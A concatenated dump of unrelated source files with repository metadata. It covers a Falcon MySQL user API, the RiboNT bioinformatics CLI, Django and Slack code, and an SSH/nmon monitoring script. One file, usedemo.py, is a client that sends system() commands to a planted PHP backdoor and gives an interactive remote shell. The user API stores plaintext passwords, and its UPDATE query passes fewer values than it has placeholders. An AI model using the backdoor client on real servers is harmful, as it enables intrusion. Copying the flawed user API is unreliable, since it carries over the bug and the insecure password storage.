db.close()
except Exception as e:
resp.body = json.dumps({'error': str(e)})
resp.status = falcon.HTTP_500
return resp
class AddUser:
def on_post(self, req, resp):
try:
db = MySQLdb.connect(**db_conf.dbConfig)
cursor = db.cursor()
raw_json = req.stream.read()
data = json.loads(raw_json, encoding='utf-8')
q = """INSERT INTO USER (user_id, UserName, Password, Email) VALUES(%s,%s,%s,%s)"""
cursor.execute(q, (data['user_id'], data['UserName'], data['Password'], data['Email']))
db.commit()
cursor.close()
output = {
'status': "Data successfully saved"
}
resp.status = falcon.HTTP_200
data_resp = json.dumps(output, encoding='utf-8')
resp.body = data_resp
db.close()
except Exception as e:
db.rollback()
resp.body = json.dumps({'error': str(e)})
resp.status = falcon.HTTP_500
return resp
class UpdateUser:
def on_put(self, req, resp):
try:
db = MySQLdb.connect(**db_conf.dbConfig)
cursor = db.cursor()
raw_json = req.stream.read()
data = json.loads(raw_json, encoding='utf-8')
q = """UPDATE `USER` SET `user_id`=%s, `UserName`=%s, `Password`=%s, `Email`=%s WHERE user_id=%s"""
cursor.execute(q, (data['user_id'], data['UserName'], data['Password'], data['Email']))
db.commit()
cursor.close()
output = {
'status': "Data successfully changed"
}
resp.status = falcon.HTTP_200
data_resp = json.dumps(output, encoding='utf-8')
resp.body = data_resp
db.close()
except Exception as e:
db.rollback()
resp.body = json.dumps({'error': str(e)})
resp.status = falcon.HTTP_500
return resp
class DeleteUser:
def on_delete(self, req, resp):
try:
user_id = req.get_param('user_id')
if user_id is None or user_id == "":
resp.body = json.dumps({'error': 'Parameter user_id is Wrong'})
resp.status = falcon.HTTP_500
return resp
db = MySQLdb.connect(**db_conf.dbConfig)
cursor = db.cursor()
q = """DELETE FROM `USER` WHERE user_id=%s"""
cursor.execute(q, (user_id,))
db.commit()
cursor.close()
output = {
'status': "Data successfully deleted"
}
resp.status = falcon.HTTP_200
data_resp = json.dumps(output, encoding='utf-8')
resp.body = data_resp
except Exception as e:
db.rollback()
resp.body = json.dumps({'error': str(e)})
resp.status = falcon.HTTP_500
return resp
| UTF-8 | Python | false | false | 3,905 | py | 6 | resources.py | 5 | 0.485531 | 0.477081 | 0 | 124 | 30.483871 | 111 |
songbo446/RiboNT | 5,695,126,640,310 | f712430011b536eae96eab2539dd8a3ab1bb303f | 15a2139027f0b43072b73cdf1e3759f7aa850136 | /RiboNT | 71735cb971555203a8bf27f5f069bfc6c8660b83 | [
"MIT"
]
| permissive | https://github.com/songbo446/RiboNT | 5fb16a9f4a3c8d01744635c2bf994e575960d72a | d848f29be96d1d117e046a475a1e4bcb7e845fbf | refs/heads/master | 2022-11-17T23:55:48.411010 | 2022-11-04T07:08:31 | 2022-11-04T07:08:31 | 182,942,241 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import sys, os, getopt, time
def main ():
usage = """
RiboNT version 1.0 by Bo Song
Usage:
RiboNT [options]* --genome <reference> --gtf <annotation> --bam <alignment>
<reference> Sequence of reference genome (fasta)
<annotation> Annotation of reference genome (gtf)
<alignment> Alignment of RPFs (bam)
Options:
--start Start codons (spearate by comma) [default: AUG]
--pcov Minimum RPF coverage of Psites (0-1) [default: 0]
--nCores Number of multiprocessors [default: 5]
--outdir Output directory [default: ./RiboNT]
--prefix Prefix of output files [default: ribont]
--Rscript Path to Rscript
--bedtools Path to bedtools
--samtools Path to samtools
"""
startCodon, outdir, prefix = 'AUG', 'RiboNT', 'ribont'
pathR = ""
pathBedtools = ""
pathSamtools = ""
nCores = 5
pcov = 0.00000000001
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "genome=", "gtf=", "bam=", "pcov=", "nCores=", "start=", "outdir=", "prefix=", "Rscript=", "bedtools=", "samtools="])
except:
sys.stdout.write(usage)
sys.exit()
if len(sys.argv[1:]) < 3:
sys.stdout.write(usage)
sys.exit()
for opt, arg in opts:
if opt in ('-h', '-help'):
sys.stdout.write(usage)
sys.exit()
elif opt in ('--genome'):
if arg is None:
sys.stdout.write(usage)
sys.exit()
else:
sys.stdout.write("Genome is: "+arg+'\n')
genome = arg
elif opt in ('--gtf'):
gtf = arg
sys.stdout.write("GTF is: "+gtf+'\n')
elif opt in ('--bam'):
bam = arg
sys.stdout.write("bam is: "+bam+'\n')
elif opt in ('--startCodon'):
startCodon = arg
sys.stdout.write("Start codons are: "+startCodon+'\n')
elif opt in ('--outdir'):
outdir = arg
sys.stdout.write("Output directory is: "+outdir+'\n')
elif opt in ('--prefix'):
prefix = arg
elif opt in ('--pcov'):
pcov = float(arg)
elif opt in ('--nCores'):
nCores = int(arg)
elif opt in ('--Rscript'):
pathR = arg
elif opt in ('--bedtools'):
pathBedtools = arg
elif opt in ('--samtools'):
pathSamtools = arg
genome = os.path.abspath(genome)
gtf = os.path.abspath(gtf)
bam = os.path.abspath(bam)
timetick = str(time.time()).split(".")[0]
logout = "log"+str(timetick)
Bin = sys.path[0]
sys.path.append(Bin+'/bin')
import ribont
sys.stdout.write("RiboNT starts ..."+'\n')
if not os.path.exists(outdir): os.makedirs(outdir)
os.chdir(outdir)
entropy = 1
if not os.path.exists(prefix): ribont.StartExtract(gtf, prefix)
if not os.path.exists(prefix+'_OffSet.txt'): ribont.OffSetExtract(bam, prefix + '.start.bed', prefix, logout, pathBedtools = pathBedtools, pathSamtools = pathSamtools)
sys.stdout.write("\tEvaluating RPFs qualities" + '\n')
if os.path.exists(prefix + '.R.txt'):
if not os.path.exists('Plot'): os.makedirs('Plot')
if not pathR:
try:
os.system('Rscript '+ Bin + '/bin/multitaper.R ' + prefix + '.R.txt 1>>' + logout)
os.system('Rscript '+ Bin + '/bin/metaplotHP.R ' + prefix + '.L.txt ' + prefix + '.R.txt 1>>' + logout)
except:
sys.stdout.write("ERROR: Rscript is not a excutable command, please provide the path to Rscript using --Rscript option")
sys.exit()
else:
os.system(pathR + '/Rscript '+ Bin + '/bin/multitaper.R ' + prefix + '.R.txt 1>>' + logout)
os.system(pathR + '/Rscript '+ Bin + '/bin/metaplotHP.R ' + prefix + '.L.txt ' + prefix + '.R.txt 2>>' + logout)
sys.stdout.write("\tExtracting genome-wide codon usages"+'\n')
if not os.path.exists(prefix + '_codonUsage.pickle'): ribont.UsageExtract(genome,gtf,nCores,prefix)
if not os.path.exists(prefix + '_dep.pickle'): entropy = ribont.PsiteAllocate(prefix + '.bed',prefix + '_OffSet.txt',prefix + '_multitaper.Freq.txt', prefix)
sys.stdout.write("\tPredicting ORFs"+'\n')
if not os.path.exists(prefix + '_orf.fa'): ribont.OrfFinder(entropy,startCodon,genome,gtf,pcov,nCores,prefix)
sys.stdout.write("\tORF prediction completed. Outputting ..."+'\n')
if not os.path.exists(prefix+'_sORF.gff'):
ribont.gffMaker(gtf, prefix + '.start.bed', prefix + '.stop.bed', prefix + '_orf.fa', prefix + '_sORF.gff',prefix + '_orf_aa.fa', prefix + '_orf_table.txt', prefix + '_summary.txt')
os.system('rm *.bed *.pickle *.R.txt *.L.txt ' + prefix)
sys.stdout.write("RiboNT completed" + '\n')
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 5,004 | 15 | RiboNT | 4 | 0.551559 | 0.545564 | 0 | 126 | 38.714286 | 189 |
|
xubzero/scripts | 15,496,242,046,318 | b0e9fa2d08f59ee331c02e9d87d39b1fe496cf0d | 6aeaf97b75bbb83596acee68d98f8582ac93dccb | /php-backdoor/oneliner/usedemo.py | 1f28f13c8cc5659cce27d1cfc059b0547579a59b | []
| no_license | https://github.com/xubzero/scripts | a1e5358f3e5f8d4bdcc7a344cfbf9a996569dfd3 | ca4777dff0197bb4b698cb0d02f8a01b388eb61a | refs/heads/main | 2023-07-23T09:40:54.758987 | 2022-06-20T13:59:46 | 2022-06-20T13:59:46 | 372,331,763 | 5 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import requests
import sys
arguments=sys.argv
scriptname=arguments[0]
session=requests.Session()
if(len(arguments) == 2):
url=arguments[1]
command=""
payload=f"system('whoami');"
user=(session.post(url,data={"cmd":f"{payload}"}).text).strip()
if user.strip() == '':
print(f"No valid user found.Check connection")
exit()
while command != 'q':
command=input(f"{user} > ")
payload=f"system('{command} 2>/dev/null');"
response=session.post(url,data={"cmd":f"{payload}"})
content=response.text
try:
content=content.decode().strip()
except:
content=content.strip()
print(f'{content}\n')
else:
print(f'\tUsage : {scriptname} httpbackdoorlocation com')
print(f'\t : {scriptname} http://localhost/tests/c0ntacts.php')
print(f'\t : {scriptname} http://localhost/tests/c0ntacts.php ')
| UTF-8 | Python | false | false | 838 | py | 32 | usedemo.py | 16 | 0.675418 | 0.667064 | 0 | 30 | 26.933333 | 70 |
scresante/codeeval | 14,499,809,607,497 | c0ba0ab75eeac0cdad87b2b88412670d8504269d | 83eee8ec138ebc1d9286e6698fdf0fabbbf6635e | /basic-syntax-fixer.py | e2e139ac3304be6ed74194d3e4e580a62009dffb | []
| no_license | https://github.com/scresante/codeeval | b9259cc745f3ef5fc67881ad3904b6712050a9f4 | 3771200fd8ce64bcfafbbed7822b3ddbadb5c564 | refs/heads/master | 2021-09-04T18:34:18.161413 | 2018-01-21T01:39:00 | 2018-01-21T01:39:00 | 46,468,549 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
#" for reformatting codeeval in vim
# nnoremap fv <Esc>:%s/f = argv/FILE = argv/<CR>
# :%s/f = 'test/FILE = 'test/<CR>
# :%s/data = open(f,/DATA = open(FILE, /<CR>
# :3,9s/except/except NameError/<CR>
# :%s/for line in data/for line in DATA/<CR>
# :let g:pymode_lint=0<CR>
# :let g:pymode_lint_on_write=0<CR>
# :let g:pymode_rope=0<CR>
from os import listdir
import re
FILELIST = listdir('.')
PYTHONFILES = list(filter(lambda x: (x.endswith('.py3') or x.endswith('.py2')),
FILELIST))
# REGEX = re.compile(r"""#!/usr/bin/python(.)
# from sys import import argv
# try:
# f = argv[1]
# except:
# f = 'tests/(\w*)'
# data = open(f,'r').read().splitlines()""", re.VERBOSE)
| UTF-8 | Python | false | false | 714 | py | 109 | basic-syntax-fixer.py | 105 | 0.605042 | 0.592437 | 0 | 23 | 30 | 79 |
HoodyH/Discord-Farm-Bot | 19,121,194,408,941 | 33aeb0aa097ae5d48384e92bebef87fae81f3190 | 062470c562518284a3147728f7a1db2da3f51d85 | /data/configs.py | c6ecf4971d08a37133cf194c6a17eabf7881611a | []
| no_license | https://github.com/HoodyH/Discord-Farm-Bot | f1f067e9c55ce30f380af8624772d9b4ab05d074 | 4a74cdb2b470a8de5e2d60597312623fd9424b29 | refs/heads/master | 2023-04-05T13:42:32.927674 | 2021-04-03T20:33:20 | 2021-04-03T20:33:20 | 199,805,641 | 0 | 0 | null | false | 2021-04-03T20:33:21 | 2019-07-31T07:41:50 | 2021-03-31T23:23:52 | 2021-04-03T20:33:21 | 25 | 0 | 0 | 0 | Python | false | false | import json
with open('config.json', 'r') as file:
_data = json.load(file)
class Account:
"""
Obj that rappresents the main user
"""
def __init__(self, data):
self.token: str = data.get('token')
self.id: int = data.get('id')
self.username: int = data.get('username')
self.routine_raw: list = data.get('routine', [])
self.actions_raw: list = data.get('actions', [])
class Configs:
def __init__(self, config_raw):
_trainer = config_raw.get('trainer')
self.trainer: Account = Account(_trainer)
self.global_actions: list = config_raw.get('global_actions', [])
self.allowed_ids: list = config_raw.get('allowed_ids', [])
self.target_id = config_raw.get('target', [])
self.log_channel = config_raw.get('log_channel', [])
self.allowed_ids.append(self.trainer.id)
self.allowed_ids.append(self.target_id)
configs = Configs(_data)
| UTF-8 | Python | false | false | 958 | py | 12 | configs.py | 10 | 0.592902 | 0.592902 | 0 | 34 | 27.176471 | 72 |
michaelhenry/AutoBotServer | 4,363,686,813,071 | 12c4dab3797ae362675ec70d8c473d24f1ff47b1 | 62ba31cd875086b24d53ce2c4c6a3d840590a518 | /apps/autobot/admin.py | 6b660832dc990166959461ead0cb84a6c04f9109 | []
| no_license | https://github.com/michaelhenry/AutoBotServer | f7a3e83498cd664e91ee9c5bb846c5dfc7246308 | bd5115582c1ff10c89312d3a9418670414b2acd1 | refs/heads/master | 2023-08-11T11:07:54.874773 | 2021-04-16T11:24:41 | 2021-04-16T11:37:19 | 208,256,202 | 1 | 0 | null | false | 2023-07-22T16:06:57 | 2019-09-13T12:02:08 | 2023-06-03T16:46:25 | 2023-07-22T16:06:56 | 9 | 1 | 0 | 2 | Python | false | false | from django.contrib import admin
from .models import (
UIAction,
UIProperty,
UIElement,
Scenario,
TestAction,
)
admin.site.register(UIAction)
admin.site.register(UIProperty)
admin.site.register(UIElement)
admin.site.register(Scenario)
admin.site.register(TestAction)
| UTF-8 | Python | false | false | 288 | py | 6 | admin.py | 4 | 0.760417 | 0.760417 | 0 | 14 | 19.571429 | 32 |
10419/Tarea-10-ejercicios | 8,873,402,442,886 | 92064f88521871695c87fd5fa21966d42f921f2c | 4a4d6edfcc3d0065d66f6c6bcefd2f420db68576 | /ejercicio 8.py | a42e0fba374828fe86076809d2c87be9746cde7b | [
"Apache-2.0"
]
| permissive | https://github.com/10419/Tarea-10-ejercicios | 6e45c0e968161945d878563157ace34262e30e0e | 9e21860cfb1715a3bd710d508d5c71bc35010801 | refs/heads/main | 2023-04-20T14:33:42.304617 | 2021-05-09T17:45:45 | 2021-05-09T17:45:45 | 364,576,242 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def estCondicional101():
print("Transportes Power")
t=0
a=int(input("ingrese la cantidad de personas:"))
print("tarifa de auto buz")
print("si son mas de 100 personas la tarifa por personas es de 20")
print("si son entre 100 y 50 personas la tarifa por personas es de 35")
print("si son entre 49 y 20 personas la tarifa por personas es de 40")
print("si son menos de 20 personas la tarifa por personas es de 70")
if a>100:
t=a*20
elif a>50 and a<100:
t=a*35
elif a>20 and a<49:
t=a*40
elif a<20:
t=a*70
print("el costo del viaje le saldra",t,"soles")
estCondicional101() | UTF-8 | Python | false | false | 612 | py | 11 | ejercicio 8.py | 10 | 0.679739 | 0.596405 | 0 | 19 | 31.263158 | 73 |
bennybauer/Shhh | 16,673,063,078,896 | d313255b90e66db0747ecbc3760dfa5c63984039 | e6d45004decda49ee74492a34a8cbed2d63e30e0 | /functions/tests/unit/test_slack.py | 83bff7a2aa607f90513f6c314a9d583a338138de | []
| no_license | https://github.com/bennybauer/Shhh | 04a6edcd2b8c36576952f9e8c30a2dbe382f5860 | 82d14e2ce4f6ddbe4edc9cdf4b7d3c6db25caabe | refs/heads/master | 2020-04-05T23:08:54.458701 | 2016-06-19T09:08:42 | 2016-06-19T09:08:42 | 58,865,902 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
from unittest import TestCase
from urlparse import parse_qs
from lib.model.slack import SlackOAuthResponse, SlackResponseMessage, SlackException, SlackCommand, SlackResponseType
__author__ = 'bauerb'
class TestSlack(TestCase):
@classmethod
def setUpClass(cls):
os.environ['SLACK_VERIFICATION_TOKEN'] = 'abcdef'
# SlackOAuthResponse tests
##########################
def create_valid_response(self):
return {
"body": {
"access_token": "xoxp-XXXXXXXX-XXXXXXXX-XXXXX",
"user_id": "usXX-XXXXXXXX-XXXXXXXX-XXXXX",
"team_name": "Team Installing Your Hook",
"team_id": "XXXXXXXXXX",
"incoming_webhook": {
"url": "https://hooks.slack.com/TXXXXX/BXXXXX/XXXXXXXXXX",
"channel": "#channel-it-will-post-to",
"channel_id": "XXX-YYY",
"configuration_url": "https://teamname.slack.com/services/BXXXXX"
}
}
}
def create_invalid_response(self):
return {
"body": {
"user_id": "usXX-XXXXXXXX-XXXXXXXX-XXXXX",
"team_name": "Team Installing Your Hook",
"team_id": "XXXXXXXXXX",
"incoming_webhook": {
"channel": "#channel-it-will-post-to",
"channel_id": "XXX-YYY",
"configuration_url": "https://teamname.slack.com/services/BXXXXX"
}
}
}
def test_valid_slack_oauth_response(self):
response = self.create_valid_response()
SlackOAuthResponse(response['body'])
def test_invalid_slack_oauth_response(self):
response = self.create_invalid_response()
with self.assertRaises(KeyError):
SlackOAuthResponse(response['body'])
# SlackResponseMessage tests
############################
def test_slack_response_message(self):
message = 'some text'
response_message = SlackResponseMessage(message).build()
self.assertEqual({'response_type': 'ephemeral', 'text': message}, response_message)
def test_slack_response_message_invalid_channel(self):
message = 'some text'
response_message = SlackResponseMessage(message).build()
self.assertEqual({'response_type': 'ephemeral', 'text': message}, response_message)
def test_slack_response_message_in_channel(self):
message = 'some text'
respone_type = SlackResponseType.in_channel
response_message = SlackResponseMessage(message, respone_type).build()
self.assertEqual({'response_type': 'in_channel', 'text': message}, response_message)
# SlackException tests
######################
def test_slack_exception(self):
error_message = 'some error'
exception = SlackException(error_message)
self.assertEqual(error_message, exception.message)
self.assertIsInstance(exception, SlackException)
self.assertIsInstance(exception, Exception)
# SlackCommand tests
######################
def test_slack_command_missing_token(self):
body = parse_qs(
"team_id=bla&team_domain=bla&channel_id=bla&"
"channel_name=bla&user_id=bla&user_name=bla&command=%2Fbla&"
"text=bla&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
with self.assertRaises(SlackException) as e:
SlackCommand(body)
self.assertEquals("Error: Access denied. Message: Token is missing", e.exception.message)
def test_slack_command_invalid_token(self):
body = parse_qs(
"token=bla&team_id=bla&team_domain=bla&channel_id=bla&"
"channel_name=bla&user_id=bla&user_name=bla&command=%2Fbla&"
"text=bla&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
with self.assertRaises(SlackException) as e:
SlackCommand(body)
self.assertEquals("Error: Access denied. Message: Invalid token", e.exception.message)
def test_slack_command_valid_token(self):
body = parse_qs(
"token=abcdef&team_id=bla&team_domain=bla&channel_id=bla&"
"channel_name=bla&user_id=abc&user_name=John&command=%2Fbla&"
"text=mycommand&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
command = SlackCommand(body)
self.assertEquals('abc', command.user_id)
self.assertEquals('John', command.user_name)
self.assertEquals('mycommand', command.text)
def test_slack_command_missing_user_id(self):
body = parse_qs(
"token=abcdef&team_id=bla&team_domain=bla&channel_id=bla&"
"channel_name=bla&user_name=John&command=%2Fbla&"
"text=mycommand&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
with self.assertRaises(KeyError) as e:
SlackCommand(body)
self.assertEquals('user_id', e.exception.message)
| UTF-8 | Python | false | false | 5,038 | py | 4 | test_slack.py | 3 | 0.605994 | 0.601231 | 0 | 129 | 38.054264 | 117 |
wesbasinger/pvcache | 5,231,270,183,941 | 4bc0175b4df0be2d96b33f3322a6d3da4d899dd4 | 0ed0407faa5868759b3ea7926585df668e7fb308 | /cache/views.py | e748c8ed456c5bd913ca5ebb7ab78b8cf61e9e87 | []
| no_license | https://github.com/wesbasinger/pvcache | 6594fb298c98d57cc50d88c4dfd68cfb391cf1af | d608cf88767e823d261bb2cbe3c6968ed89b71ed | refs/heads/master | 2021-01-19T02:22:30.464610 | 2016-07-14T12:42:48 | 2016-07-14T12:42:48 | 49,754,013 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .models import Geocache, Log
from .forms import CacheForm, NewUserForm
from xml.etree.ElementTree import Element, SubElement, Comment, tostring
def index(request):
listings = Geocache.objects.all()
return render(request, 'index.html', {'listings' : listings})
def listing(request, geocache_id):
if request.method == 'POST':
listing = Geocache.objects.get(pk=geocache_id)
new_log_text = request.POST['log_text']
username = request.user.username
new_entry = Log(text=new_log_text, geocache=listing, author=username)
new_entry.save()
logs = listing.log_set.all().order_by('-id')
return render(request, 'listing.html', {
'listing': listing,
'logs': logs,
})
listing = Geocache.objects.get(pk=geocache_id)
logs = listing.log_set.all().order_by('-id')
return render(request, 'listing.html', {
'listing': listing,
'logs': logs})
@login_required
def new(request):
if request.method == "POST":
form = CacheForm(request.POST)
if form.is_valid():
geocache = form.save(commit=False)
geocache.save()
return HttpResponseRedirect('/')
else:
form = CacheForm()
return render(request, 'new.html', {'form': form})
@login_required
def delete(request, geocache_id):
listing = Geocache.objects.get(pk=geocache_id)
listing.delete()
listings = Geocache.objects.all()
return HttpResponseRedirect('/')
def newuser(request):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
new_user = User.objects.create_user(
username=request.POST['username'],
password=request.POST['password']
)
new_user.save()
return HttpResponseRedirect('/')
else:
form = NewUserForm()
return render(request, 'newuser.html', {'form': form})
def about(request):
return render(request, 'about.html', {})
def gpx(request, geocache_id):
cache = get_object_or_404(Geocache, pk=geocache_id)
root = Element('gpx')
root.set('xmlns', 'http://ww.topografix.com/GPX/1/1')
root.set('creator', 'Wes Basinger')
root.set('version', '1.1')
root.set('xmlns:xsi', 'http://www.w3.org/2001/XMLSchema-instance')
root.set('xmlns:xsiSchemaLocation', 'http://www.togografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd')
md = SubElement(root, 'metadata')
nm = SubElement(md, 'name')
nm.text = cache.title
ds = SubElement(md, 'description')
ds.text = cache.description
wpt = SubElement(root, 'wpt')
wpt.set('lat', str(cache.latitude))
wpt.set('lon', str(cache.longitude))
bounds = SubElement(root, 'bounds')
bounds.set('minlat', str(cache.latitude))
bounds.set('minlon', str(cache.longitude))
bounds.set('maxlat', str(cache.latitude))
bounds.set('maxlon', str(cache.longitude))
nr = SubElement(wpt, 'name')
nr.text = "VT Cache"
sy = SubElement(wpt, 'sym')
sy.text = 'Waypoint'
str_output = tostring(root)
response = HttpResponse(str_output, content_type='text/xml')
response['Content-Disposition'] = 'attachment; filename="%s.gpx"' % cache.title
return response
| UTF-8 | Python | true | false | 3,183 | py | 12 | views.py | 6 | 0.705624 | 0.699654 | 0 | 106 | 29.028302 | 115 |
avulalakshman/python-ws | 17,970,143,192,450 | 854b7715803ebc8fcbcba0707f9424b36c649def | c4c2e8993e9561855c3800e1f33726de8b855cd5 | /primecount.py | 03af0ebae4bc27ce9d03320de1756f85c1d7283d | []
| no_license | https://github.com/avulalakshman/python-ws | 879a26bdc7164cd49b33fcfc474f526253d21093 | 2977fb8b5a6a4bc933788fad5e4e0f883f07c26d | refs/heads/master | 2022-02-01T00:14:17.134905 | 2019-07-22T08:52:41 | 2019-07-22T08:52:41 | 198,148,819 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def isPrime(num):
''' If given number is prime it returns true otherwise false'''
if num < 2:
return False
else:
for i in range(2, num// 2 + 1):
if num % i == 0:
return False
return True
| UTF-8 | Python | false | false | 248 | py | 3 | primecount.py | 3 | 0.508065 | 0.487903 | 0 | 9 | 26.444444 | 67 |
NadyaNikol/AutoMailing_Bot_and_AdminPanel_Python | 15,917,148,799,949 | 10c902c4689e268a2d15928929d634ea7dcec9cc | fe90f72c29fc1dbbb72c9ba4c08988718121c356 | /djangoMail/entrance/migrations/0002_auto_20201221_2020.py | 21acbf37246c7bb7eebc71ad4e475f00320f4402 | []
| no_license | https://github.com/NadyaNikol/AutoMailing_Bot_and_AdminPanel_Python | 943fbff57006d407fbffb88fea5d640a988736ed | ff3b14e75be7241fab714a686944a9ed57597949 | refs/heads/main | 2023-05-05T13:23:56.983621 | 2021-06-03T20:01:04 | 2021-06-03T20:01:04 | 325,529,241 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.1.4 on 2020-12-21 18:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('entrance', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='Users',
new_name='UsersMailing',
),
]
| UTF-8 | Python | false | false | 325 | py | 24 | 0002_auto_20201221_2020.py | 15 | 0.578462 | 0.52 | 0 | 17 | 18.117647 | 47 |
SpicyKong/problems | 8,521,215,159,220 | ec3f8b4b1ad9f870df0da057f04184225d6b116c | cee2ae974f6b416e59a001151f1ea84a253dfd08 | /BOJ/Q_5427.py | d4c8fb3f0ac06d0bbc2899ac8f76bd2bd5b7d8fd | []
| no_license | https://github.com/SpicyKong/problems | e8897fab9e69d07c67fc2f13dc485cc3ac1e8c5a | 732ad9c11bb4b3a8e8b68f565b15c1b481e110d5 | refs/heads/master | 2021-08-16T07:10:03.387082 | 2020-07-03T12:49:18 | 2020-07-03T12:49:18 | 199,583,988 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # https://www.acmicpc.net/problem/5427 문제 제목 : 불 , 언어 : Python, 날짜 : 2020-04-29, 결과 : 성공
"""
이 문제는 흔한 유형의 BFS문제다. 불을 키우는 조건이 맞는 지 확인하고 플레이어가 다음번 턴에 갈 수 있는곳을 모두 방문하면 된다.
과제가 많아서 양심에 찔리지만 비교적 쉬운 BFS문제를 풀었다.. 하지만 과제가 중간고사를 대체하는것이라 열심히 해야하기 때문에 어쩔수 없었다..
그리고 오늘 운좋게 소마 2차 온라인 코테 합격메일이 왔다. 문제는 내 스펙이 전혀 없기때문에 붙을 가능성은 희박할거 같다. 하지만 그래도
다음번 지원을 위해 면접을 한번 경험해 보는것은 추후에 분명히 도움이 되리라 생각하고 열심히 준비 해야 겠다.
"""
import sys
from collections import deque
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
def fire(imsi_queue):
result_queue = deque()
while imsi_queue:
now_x, now_y = imsi_queue.popleft()
for i in range(4):
nx = dx[i] + now_x
ny = dy[i] + now_y
if 0 <= nx < N and 0 <= ny < M:
if not list_visit[ny][nx] or list_visit[ny][nx]==1:
list_visit[ny][nx] = 2
result_queue.append([nx, ny])
return result_queue
def bfs():
global N, M, list_map, list_visit
list_queue = deque()
list_fire = deque()
for y in range(M):
for x in range(N):
if list_map[y][x] == '*':
list_fire.append([x, y])
list_visit[y][x] = 2
elif list_map[y][x] == '@':
list_queue.append([x, y, 0])
list_visit[y][x] = 1
elif list_map[y][x] == '#':
list_visit[y][x] = 3
count_queue = 1
next_queue = 0
while list_queue:
now_x, now_y, now_count = list_queue.popleft()
count_queue -= 1
if 0 >= count_queue:
list_fire = fire(list_fire)
count_queue = next_queue
next_queue = 0
for i in range(4):
nx = now_x + dx[i]
ny = now_y + dy[i]
if 0 <= nx < N and 0 <= ny < M:
if not list_visit[ny][nx]:
list_visit[ny][nx] = 1
list_queue.append([nx, ny, now_count+1])
next_queue+=1
else:
return now_count+1
return 'IMPOSSIBLE'
T = int(sys.stdin.readline())
for _ in range(T):
N, M = map(int, sys.stdin.readline().split())
list_map = [sys.stdin.readline().strip() for _ in range(M)]
list_visit = [[0]*N for _ in range(M)]
print(bfs())
| UTF-8 | Python | false | false | 2,723 | py | 296 | Q_5427.py | 291 | 0.49276 | 0.473892 | 0 | 68 | 32.514706 | 88 |
donginhb/AutoDemo | 9,311,489,136,880 | 5d7bb98bcb97de73c27bba1a22b1a19fe3c0ac20 | 2a6e8695810a82c6d1cad663168ef44667f07bb0 | /libs/jenkins_builder/Stop_Nmon_On_Centos.py | caf2de70b435daaba8b8023faa9b56c09d833e91 | []
| no_license | https://github.com/donginhb/AutoDemo | 6f9b81c8e8759beffeb0f872bffc2593a4298967 | 0df59118b44bc350dcdd775adc8e1bffc2331d84 | refs/heads/master | 2020-03-21T12:30:00.084903 | 2018-03-28T04:33:32 | 2018-03-28T04:33:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
#-*- coding:UTF-8 -*-
"""
#===============================================================================
# Stop Nmon monitoring,when jmeter finished
# Upload nmon result *.nmon fils to xtcAuto project folder TempReportmonReport
#===============================================================================
"""
import traceback
import paramiko
import time
import os
class SSHClient(object):
def __init__(self, params):
self.port = 22
def connection(self,hostname,username,password,timeout=60.0):
try:
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
client.connect(hostname, self.port,username,password,timeout=60.0)
except Exception as e:
print('*** Caught exception: %s: %s' % (e.__class__, e))
traceback.print_exc()
client.close()
return client
def write_commands(self,client,cmds,timeout=15.0):
try:
stdin, stdout, stderr = client.exec_command(cmds,timeout)
except Exception as e:
client.close()
return e
return stdout
def stop_nmon(self,hostname, username, password):
client = self.connection(hostname, username, password)
GetNmonPidCmds = "ps aux | grep nmon |awk 'NR == 1' |awk '{print $2}'"
stdout = self.write_commands(client, GetNmonPidCmds)
stdout = stdout.readlines()
stdout = self.write_commands(client, "kill -USR2 %d" % (int(stdout[0])))
def upload_file_ncftpput(self,SSHClient,ftpServer,ftpUser,ftpPasswd,logServerPath,LocalFilepath):
ncftpputCmds = "/usr/bin/ncftpput -u %s -p %s %s %s %s/*.nmon" % (ftpUser,ftpPasswd,ftpServer,logServerPath,LocalFilepath)
try:
stdout = self.write_commands(SSHClient, ncftpputCmds)
except Exception as e:
print('*** ftp_connection: %s: %s' % (e.__class__, e))
return None
def connect_sftp(self,hostname,username,password):
try:
t = paramiko.Transport((hostname,self.port))
t.connect(username = username,password = password)
sftp = paramiko.SFTPClient.from_transport(t)
return sftp
except Exception as e:
print('*** Connect_sftp Caught exception: %s: %s' % (e.__class__, e))
traceback.print_exc()
try:
t.close()
except:
pass
sys.exit(1)
def listdir_sftp(self,sftp_client,dir_root):
return sftp_client.listdir(dir_root)
def getfile_sftp(self, sftp_client,remotepath, localpath=None):
sftp_client.get(remotepath, localpath)
def upload_nmonResult_sftp(self,hostname,username,password,remotepath, localpath):
try:
sftp_client = self.connect_sftp(hostname,username,password)
for files in self.listdir_sftp(sftp_client,remotepath):
if "nmon" in os.path.splitext(files)[1]:
self.getfile_sftp(sftp_client,remotepath+"/"+files, os.path.join(localpath,files))
return True
except Exception as e:
print('*** upload_nmonResult_sftp Caught exception: %s: %s' % (e.__class__, e))
return False
